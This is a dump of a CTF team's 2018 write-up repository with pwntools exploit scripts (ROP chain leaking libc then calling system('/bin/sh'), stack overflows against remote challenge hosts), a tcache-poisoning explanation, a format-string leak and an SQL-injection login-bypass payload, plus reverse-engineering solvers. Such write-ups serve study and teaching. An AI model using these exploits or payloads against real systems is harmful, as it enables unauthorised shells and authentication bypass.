payload = b"A" * 22       # padding up to the saved return address
payload += rop.chain()

print(p.recvuntil(b"You should find puts yourself"))
p.sendline(payload)
leak = p.recvuntil(b"You should find puts yourself")   # contains the leaked puts

# The 4 address bytes follow one leading byte of output, hence [1:5];
# u32() needs exactly 4 bytes, so nothing is stripped from them.
leaked_puts = u32(leak[1:5])
log.info("PUTS: " + hex(leaked_puts))

# Rebase libc on the leaked address
libc.address = leaked_puts - libc.symbols['puts']
log.info("LIBC: " + hex(libc.address))

# Second chain: system("/bin/sh") from the rebased libc
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')))
# rop2.call(elf.symbols['main'])

print(rop2.dump())

payload = b"A" * 22
payload += rop2.chain()

p.clean()
p.sendline(payload)

print("[+] Enjoy your shell")
p.interactive()
# print(p.recvuntil(b"done!"))

p.close()
```
--------------------------------------------------------------------------------
/2018/Sharif/Pwn75-leak_puts/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn75-leak_puts/libc.so.6
--------------------------------------------------------------------------------
/2018/Sharif/Pwn75-leak_puts/vuln4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Pwn75-leak_puts/vuln4
--------------------------------------------------------------------------------
/2018/Sharif/Web/Hidden-Input/img/burp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/burp.png
--------------------------------------------------------------------------------
/2018/Sharif/Web/Hidden-Input/img/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/login.png
--------------------------------------------------------------------------------
/2018/Sharif/Web/Hidden-Input/img/sql.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/Hidden-Input/img/sql.png
--------------------------------------------------------------------------------
/2018/Sharif/Web/Hidden-Input/readme.md:
--------------------------------------------------------------------------------
**Web - Hidden input - 50pts**

![Alt](img/login.png "Accueil")

Challenge statement:
```
Login if you can :)
```

**Solution:**

A hidden field **debug** is present on the login page; by default it is set to 0.

After several authentication attempts, no error is returned.
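As an added example (not the challenge's code), here is what a login check with that hidden debug field and a string-built query looks like, beside a parameterized version that resists the same input; the table layout and query shape are assumptions chosen to match the `admin') OR 1=1#` payload used in this writeup, and SQLite stands in for the server so the example runs offline.

```python
#!/usr/bin/env python3
# Added example (not the challenge's code): a login check with the two flaws the
# writeup exploits, string-built SQL and a client-controlled "debug" field that
# returns database errors, next to a parameterized version that resists the same
# input. The table layout and the query shape are assumptions made to match the
# payload in the writeup; SQLite is used so this runs offline, and because "#"
# is a MySQL comment marker, the SQLite payloads below end with "-- " instead.

import sqlite3

CONN = sqlite3.connect(':memory:')
CONN.execute('CREATE TABLE users (username TEXT, password TEXT)')
CONN.execute("INSERT INTO users VALUES ('admin', 'constructed-sample-secret')")


def login_vulnerable(username, password, debug=0):
    """Builds the query by string formatting. With debug=1 (the hidden field in
    the writeup) the database error is sent back to the client, which is how the
    injection point was confirmed. Returns (logged_in, error_message)."""
    query = ("SELECT username FROM users WHERE (username='%s' AND password='%s')"
             % (username, password))
    try:
        row = CONN.execute(query).fetchone()
    except sqlite3.Error as exc:
        # debug=1 leaks the driver's error text to the client
        return False, str(exc) if debug else 'Login failed'
    return row is not None, ''


def login_parameterized(username, password, debug=0):
    """Same check with bound parameters: the quote, the parenthesis and the
    comment marker in the payload are plain characters of the compared string."""
    query = 'SELECT username FROM users WHERE (username=? AND password=?)'
    try:
        row = CONN.execute(query, (username, password)).fetchone()
    except sqlite3.Error as exc:
        return False, str(exc) if debug else 'Login failed'
    return row is not None, ''


def is_suspicious_login(username):
    """Cheap server-side signal worth logging: quote, parenthesis or comment
    markers rarely appear in a legitimate username."""
    markers = ("'", '"', ')', '--', '#', ';')
    return any(m in username for m in markers)


if __name__ == '__main__':
    print(login_vulnerable("admin')", 'test', debug=1))          # error text leaks
    print(login_vulnerable("admin') OR 1=1-- ", 'test'))         # (True, '')
    print(login_parameterized("admin') OR 1=1-- ", 'test'))      # (False, '')
```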
But if we set the **debug** field to 1 and attempt a SQL injection, we get:

![Alt](img/sql.png "SQLI")

We then need to build a payload that bypasses the authentication:

```
Username=admin') OR 1=1#&Password=test&debug=1
```
We send the request:

![Alt](img/burp.png "Flag")

The flag is:
```
SharifCTF{c58a108967c46222bbdc743e15932c26}
```

By team Beers4Flags
--------------------------------------------------------------------------------
/2018/Sharif/Web/The-News-Hacker/img/admin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/admin.png
--------------------------------------------------------------------------------
/2018/Sharif/Web/The-News-Hacker/img/burp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/burp.png
--------------------------------------------------------------------------------
/2018/Sharif/Web/The-News-Hacker/img/wordpress.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Sharif/Web/The-News-Hacker/img/wordpress.png
--------------------------------------------------------------------------------
/2018/Thcon/Network/50/readme.md:
--------------------------------------------------------------------------------
**Network - DockerLeak - 50pts**

Challenge statement:
```
During the deployment of the challenges of the THC, an attacker was able to dump the network traffic.

Can you find the flag?
```

We start with a dump.pcap file [Sources](sources/dump.pcap)

**Solution:**

As with any 50-point challenge, the quickest option is often the strings command:

```bash
strings dump.pcap | grep -A1 -i THC{
#define FLAG "THC{d0c4ErSo(ke!m
5T_U5e_HtT6S}"
```

Flag:

```
THC{d0c4ErSo(ke!m5T_U5e_HtT6S}
```

By team Beers4Flags
--------------------------------------------------------------------------------
/2018/Thcon/Network/50/sources/dump.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Network/50/sources/dump.pcap
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/200-android/THC.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/200-android/THC.apk
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/200-android/solver.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3

from z3 import Int, Solver, sat

solver = Solver()

# The serial is 20 characters long: one integer variable per character.
c = [Int('c%d' % i) for i in range(20)]

# Every character must be printable, between ' ' (0x20) and '~' (0x7e).
for ci in c:
    solver.add(ci >= 0x20, ci <= 0x7e)

# Constraints recovered from MainActivity.class.
# On z3 Ints, / is the integer division and % the modulo.
solver.add(c[4] == 45)
solver.add(c[9] == 45)
solver.add(c[14] == 45)
solver.add(c[5] == c[6] + 1)
solver.add(c[5] == c[18])
solver.add(c[1] == c[18] % 4 * 22)
solver.add(c[10] == c[3] * c[15] / c[17] - 1)
solver.add(c[10] == c[1])
solver.add(c[13] == c[10] + 5)
solver.add(c[10] == c[5] - 9)
solver.add(c[0] % c[7] * c[11] == 1440)
solver.add(c[2] - c[8] + c[12] == c[10] - 9)
solver.add((c[3] + c[12]) / 2 == c[16])
solver.add(c[0] - c[2] + c[3] == c[12] + 15)
solver.add(c[3] == c[13])
solver.add(c[16] == c[0])
solver.add(c[7] + 1 == c[2])
solver.add(c[15] + 1 == c[11])
solver.add(c[11] + 3 == c[17])
solver.add(c[7] + 20 == c[6])

# check() returns sat when a solution exists; its result is never falsy, so it
# has to be compared to sat. model() then holds the value of each character.
if solver.check() == sat:
    model = solver.model()
    print(model)
    print(''.join(chr(model[ci].as_long()) for ci in c))
else:
    print('Not found.')
```
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a761.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a761.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a7c.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a7c.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-modif-stack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-modif-stack.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-sub-874.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-sub-874.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-functions.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-functions.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-main-decomp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-main-decomp.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-positive-sp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-positive-sp.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-stack-761.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-stack-761.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/img/cls-verify-hardcoded-flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-verify-hardcoded-flag.png
--------------------------------------------------------------------------------
/2018/Thcon/Reverse/250-call_less_reverse/solver.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/env python3

import sys


def processing(byte):
    """Transformation the binary applies to each input byte. Since OR-ing 0x80
    throws information away it cannot be inverted directly, so we apply it to
    every printable candidate and compare with the expected byte."""
    res = byte | 0x80
    res = res ^ 0xCA
    res = res + 66
    res = res ^ 0xCA
    res = res + 66
    res = res ^ 0xCA
    res = res + 66
    res = res ^ 0xFE
    return res & 0xff


def recover_flag(expected):
    """Brute-force each expected byte over the printable range (' ' to '~'),
    then reverse the result since the characters come out back to front.
    A byte no candidate maps to is shown as '?'."""
    chars = []
    for e in expected:
        for cand in range(ord(' '), ord('~') + 1):
            if processing(cand) == e:
                chars.append(chr(cand))
                break
        else:
            chars.append('?')
    return ''.join(reversed(chars))


if __name__ == '__main__':
    path = sys.argv[1] if len(sys.argv) > 1 else 'expected.bin'
    with open(path, 'rb') as f:
        expected = f.read()
    print('flag: ' + recover_flag(expected))
```
--------------------------------------------------------------------------------
/2018/Thcon/Web/200/sources/sources.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Web/200/sources/sources.zip
--------------------------------------------------------------------------------
/2018/Thcon/Web/300/img/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Web/300/img/flag.png
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Attendance/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            attendance
File format         ELF32
Architecture        x86
Endianess           little endian
Entry point         0x8048560
Loadables segments  2
Sections            32

NX bit              enabled
SSP                 disabled
Relro               partial
RPATH               no rpath
RUNPATH             no runpath
PIE                 disabled
```
Simple buffer overflow. See payload.py
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Attendance/attendance:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Attendance/attendance
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Attendance/payload.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python3
# encoding: utf-8
from pwn import *
import sys

binaire = 'attendance'
elf = ELF(binaire)
if len(sys.argv) > 1:
    # local instance
    # libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    host = 'localhost'
    port = 59994
else:
    # remote challenge
    # libc=ELF('libc-chall.so.6')
    host = '89.38.210.128'
    port = 31337

p = remote(host, port)

def waitmenu():
    return p.recvuntil(b"Call>")

p.sendline(b"31337")

# Crash under gdb with the pattern below: EIP ends up at 0x4c4c4b4b ("KKLL"),
# so the saved return address starts 48 bytes into the message.
'''
ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM
Principal got your message ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQR

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x0000005b EBX: 0x48484747 ECX: 0xffffaa70 EDX: 0xf7f9c870 o d I t S z a p c
ESI: 0x44444343 EDI: 0x46464545 EBP: 0x4a4a4949 ESP: 0xffffcff0 EIP: 0x4c4c4b4b
CS: 0023 DS: 002b ES: 002b FS: 0000 GS: 0063 SS: 002bError while running hook_stop:
Cannot access memory at address 0x4c4c4b4b
0x4c4c4b4b in ?? ()
(gdb) RSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM
Undefined command: "RSSTTUUVVWWXXYYZZ".  Try "help".
(gdb)
'''
# Overwrite the return address with the function that prints the flag
p.sendline(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJ" + p32(elf.sym['bring_students_to_school']))

p.interactive()
```
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Cdparty/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            c_party
File format         ELF32
Architecture        x86
Endianess           little endian
Entry point         0x8048700
Loadables segments  2
Sections            30

NX bit              enabled
SSP                 disabled
Relro               partial
RPATH               no rpath
RUNPATH             no runpath
PIE                 disabled
```
Here again, a buffer overflow lets us jump to the right place in the program.
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Cdparty/c_party:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Cdparty/c_party
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Cdparty/c_party.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Cdparty/c_party.zip
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Cdparty/payload.py:
--------------------------------------------------------------------------------
```python
#!/usr/bin/python3
# encoding: utf-8
from pwn import *
import sys

binaire = 'c_party'
elf = ELF(binaire)
if len(sys.argv) > 1:
    # local instance
    # libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    host = 'localhost'
    port = 59994
else:
    # remote challenge
    # libc=ELF('libc-chall.so.6')
    host = '89.38.210.128'
    port = 31338

p = remote(host, port)

def waitmenu():
    return p.recvuntil(b"Password:")

# gdb crash output kept from the Attendance challenge
'''
ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM
Principal got your message ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQR

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x0000005b EBX: 0x48484747 ECX: 0xffffaa70 EDX: 0xf7f9c870 o d I t S z a p c
ESI: 0x44444343 EDI: 0x46464545 EBP: 0x4a4a4949 ESP: 0xffffcff0 EIP: 0x4c4c4b4b
CS: 0023 DS: 002b ES: 002b FS: 0000 GS: 0063 SS: 002bError while running hook_stop:
Cannot access memory at address 0x4c4c4b4b
0x4c4c4b4b in ?? ()
(gdb) RSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM
Undefined command: "RSSTTUUVVWWXXYYZZ".  Try "help".
(gdb)
'''
pause()
p.sendline(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLL" + p32(0x804a210) + p32(0x8048afb))

print(p.recvall(2))
```
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/HeapSchool/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            heaphop
File format         ELF64
Architecture        x86-64
Endianess           little endian
Entry point         0x400780
Loadables segments  3
Sections            28

NX bit              enabled
SSP                 enabled
Relro               partial
RPATH               no rpath
RUNPATH             no runpath
PIE                 disabled
```
The method used is tcache poisoning, since the libc is a 2.26 and therefore has a tcache. For this we use the available use-after-free: the pointer is still usable after the block has been freed.
We allocate a block, free it, write the address of free's GOT entry at the start of the block, allocate a block (the cache is now poisoned), then allocate once more and get a block that points to free's GOT entry. Reading that address gives us the libc address. We replace it with the address of system.
Finally we allocate a block in which we write /bin/sh, and we free that block. We get a shell.
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/HeapSchool/heaphop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/HeapSchool/heaphop
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Letssort/letssort:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Letssort/letssort
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Letssort/libc.so.6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Letssort/libc.so.6
--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Memo/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            memo
File format         ELF64
Architecture        x86-64
Endianess           little endian
Entry point         0x400a00
Loadables segments  2
Sections            29

NX bit              enabled
SSP                 disabled
Relro               partial
RPATH               no rpath
RUNPATH             no runpath
PIE                 disabled
```

The program has a format string vulnerability in the display of the name at the end of the game. And the flag is read into memory at some point at the start of main.
29 | Un affichage de toutes les chaines pointées par les mots sur la pile donne le 30 | résultat: 31 | 32 | francois@aramis:~/BFF/Timisoara/Memo$ python payload.py SILENT 33 | You have a very good memory n? 34 | 35 | H=���s1�H\x83�\xfe� 36 | 37 | g5d\xb4\x7f 38 | Let's play 39 | Your name? > 40 | (null) 41 | (null) 42 | \xa0\x8c\h 43 | (null) 44 | (null) 45 | (null) 46 | UH\x89�H�� H\xbf%\x13@ 47 | UH\x89�H�� H\xbf%\x13@ 48 | UH\x89�H�� H\xbf%\x13@ 49 | 1�I��^H\x89�H���PTI���@ 50 | timctf{t0_4rr1ve_4t_th3_s1mple_is_d1ff1cult} 51 | (null) 52 | AWAVA\x89\xffAUATL\x8d%\x86\x0c 53 | \x89���� 54 | @\x8f\x80=� 55 | UH\x89�H�� 56 | (null) 57 | 1�I��^H\x89�H���PTI���@ 58 |  59 | (null) 60 | (null) 61 | (null) 62 | (null) 63 | (null) 64 | Eo�%� 65 | 66 | �\x1f 67 | (null) 68 | (null) 69 | 1�I��^H\x89�H���PTI���@ 70 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo.exe -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo.zip -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/pile: -------------------------------------------------------------------------------- 1 | 7f848e59d780 
7f848e2ce2c0 2 | 7ffc62301701 1c1fc37b45 3 | 401256 d00000000 4 | 0 6f 5 | 3 7ffe6b798e30 6 | 78 0 7 | 401020 400aa0 8 | 401160 7fc4ef4ee830 9 | 1d4152ca0 400ba0 10 | 400aa0 7fff4c8ddf90 11 | c014f825d7123206 c176528f3f223206 12 | 0 7ffda2147498 13 | 0 0 14 | 0 400aca 15 | 1 7fffef1ebf40 16 | 7ffc1c3a7f57 7ffc1c3a7f99 17 | 7ffcc80ecfce 0 18 | 10 1f8bfbff 19 | 11 64 20 | 4 38 21 | 7 7f699d95b000 22 | 9 400aa0 23 | c 3ed 24 | e 3ed 25 | 19 7ffcb6339989 26 | f 7ffe54b59069 27 | 0 7e6188685db20500 28 | 0 0 29 | 0 0 30 | 0 0 31 | 0 0 32 | 0 0 33 | 622f6c61636f6c2f 2f7273752f3a6e69 34 | 0 0 35 | 0 0 36 | 0 0 37 | 0 0 38 | 0 0 39 | 0 0 40 | 0 0 41 | 0 0 42 | 0 0 43 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/pilelocaleSansASLR: -------------------------------------------------------------------------------- 1 | démarre à 2 2 | 7fef20aec760 7fef2082c760 3 | 0 1c00000000 4 | 401123 d00000000 5 | 400b0000000000 6f 6 | 3 7ffc53afedef 7 | 78 0 8 | 400f10 400a00 9 | 401050 7f9e622582b1 10 | 1badd12e8 400b00 11 | 400a00 7ffce6631a50 12 | 138a5357df73205a 12593ef23ba1205a 13 | 0 7ffe8e8c3fc8 14 | 0 0 15 | 0 400a2a 16 | 1 7ffd20822301 17 | 7fff7fce6334 7fff7fce6342 18 | 7fffeb9ba379 7fffeb9ba381 19 | 7ffcbc9c83ea 7ffcbc9c844c 20 | 7ffef412848a 7ffef412849c 21 | 7ffe8e5744da 7ffe8e5745c1 22 | 7ffd46f6572b 7ffd46f65741 23 | 7ffea76137a7 7ffea76137b7 24 | 7fff2a110db1 7fff2a110dd7 25 | 7ffef4cc7e4f 7ffef4cc7e5f 26 | 7ffee7f4eede 7ffee7f4ef10 27 | 7ffdfa408f8c 7ffdfa408fd4 28 | 7ffce7ad6000 10 29 | 1000 11 30 | 400040 4 31 | 9 7 32 | 0 9 33 | 3e8 c 34 | 3e8 e 35 | 0 19 36 | 7ffc28043fed f 37 | 0 fa69a5348b100f00 38 | 0 0 39 | 0 0 40 | 0 0 41 | 0 0 42 | 0 0 43 | 0 0 44 | 0 0 45 | 0 0 46 | 0 0 47 | 0 0 48 | 0 0 49 | 0 0 50 | 0 0 51 | 0 0 52 | 0 0 53 | 0 0 54 | 0 0 55 | 0 0 56 | 0 0 57 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/README.md: 
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara"
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---
```
===== INFOS =====
Filename            pwnescu
File format         ELF64
Architecture        x86-64
Endianess           little endian
Entry point         0x9f0
Loadables segments  2
Sections            29

NX bit              enabled
SSP                 enabled
Relro               partial
RPATH               no rpath
RUNPATH             no runpath
PIE                 enabled
```
The chance function looks like this:

```c
void chance(char *p){
    char buf[4096];
    int readcount = read(0, buf, 4095);
    if (readcount < 10) {
        puts("Come on.... seriously?");
        exit(-1);
    }
    validate(buf, readcount);

    if (memcmp(buf, p, 100) == 0 ){
        puts("You win!");
        system("cat /home/`whoami`/flag");
        exit(0);
    } else {
        puts("Guess again!");
    }
}
```

So we can simply send it a string of 11 characters. Only that string is checked
for uppercase letters. Yet on the one hand the program puts no terminating 0 at
the end, and on the other hand the hash produced by the program persists in
memory on the stack, at the very place where the computed hash is stored.

So it is enough to grab the seed the program prints at the start, compute the
successive hashes and send the first 11 characters (with no linefeed after
them). At some point there will be no uppercase letter among those characters
and we will pass the test.

Oddly, it does not work every time, but oh well...

```
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

You win!
timctf{a64447f8c8c8bc638ed56a9fdfd7d33c8c760359}

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Pwnescu/payload.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# encoding: utf-8
from pwn import *
import time
import sys
import os

#binaire='heaphop'
TIME=0.02
if (len(sys.argv)>1):
    # elf=ELF(binaire)
    # libc=ELF('libc.so.6')
    host='localhost'
    port=59994
else:
    # elf=ELF(binaire)
    # libc=ELF('libc.so.6')
    host='89.38.210.128'
    port=1337

p=remote(host,port)
b=p.recvuntil("!\n")                       # banner: "Today's magic number is <seed>" then "Let's play a game!"
print b
sseed=b[b.index("is ")+3:b.index("\n")]    # hex seed printed by setup()
seed=int(sseed,16)
print sseed
# replay the server's rand() sequence with the same seed (see rand.c):
# one candidate string per line, a line of 'a' where the candidate contains an uppercase letter
os.system("./rand "+sseed+" > resultat")
f=open("resultat","r")
l=f.readline()
print p.recvuntil("!\n")                   # rest of the intro text
while(len(l)>0):
    print l
    p.send(l[0:11])                        # first 11 characters, no trailing linefeed
    print p.recv(1024)                     # recv() takes a byte count, not a string
    l=f.readline()
f.close()

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Pwnescu/pwnescu:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Pwnescu/pwnescu

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Pwnescu/pwnescu.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>

void setup(){
    int fd = open("/dev/urandom", O_RDONLY);
    long int seed;
    read(fd, &seed, sizeof(seed) );
    srand(seed);
    printf("Today's magic number is %lx\n", seed);   /* the seed is disclosed, so the rand() stream is predictable */
    alarm(60);
    close(fd);

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);

}

char *gen_rand_string(int len)
{
    int i;
    char buf[4096];
    char tab[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ";
    for(i = 0 ; i < len; i ++){
        char c = tab[rand() % (sizeof(tab)-1) ];
        buf[i] = c;
    }
    buf[len] = 0;

    char *s = calloc(len+1, 1);
    memcpy(s, buf, len+1);
    return s;
}

void validate(char *buf, int sz){
    int i;
    for(i = 0 ; i < sz; i++)
        if ( buf[i] >= 'A' && buf[i] <= 'Z') {
            puts("Come on.... seriously?");
            exit(-1);
        }
}

void chance(char *p){
    char buf[4096];
    int readcount = read(0, buf, 4095);   /* buf is never zero-terminated; bytes past readcount are whatever was on the stack */
    if (readcount < 10) {
        puts("Come on.... seriously?");
        exit(-1);
    }
    validate(buf, readcount);             /* only the bytes actually read are checked for uppercase */

    if (memcmp(buf, p, 100) == 0 ){       /* but all 100 bytes are compared */
        puts("You win!");
        system("cat /home/`whoami`/flag");
        exit(0);
    } else {
        puts("Guess again!");
    }
}


int main()
{
    setup();
    puts("Let's play a game!");
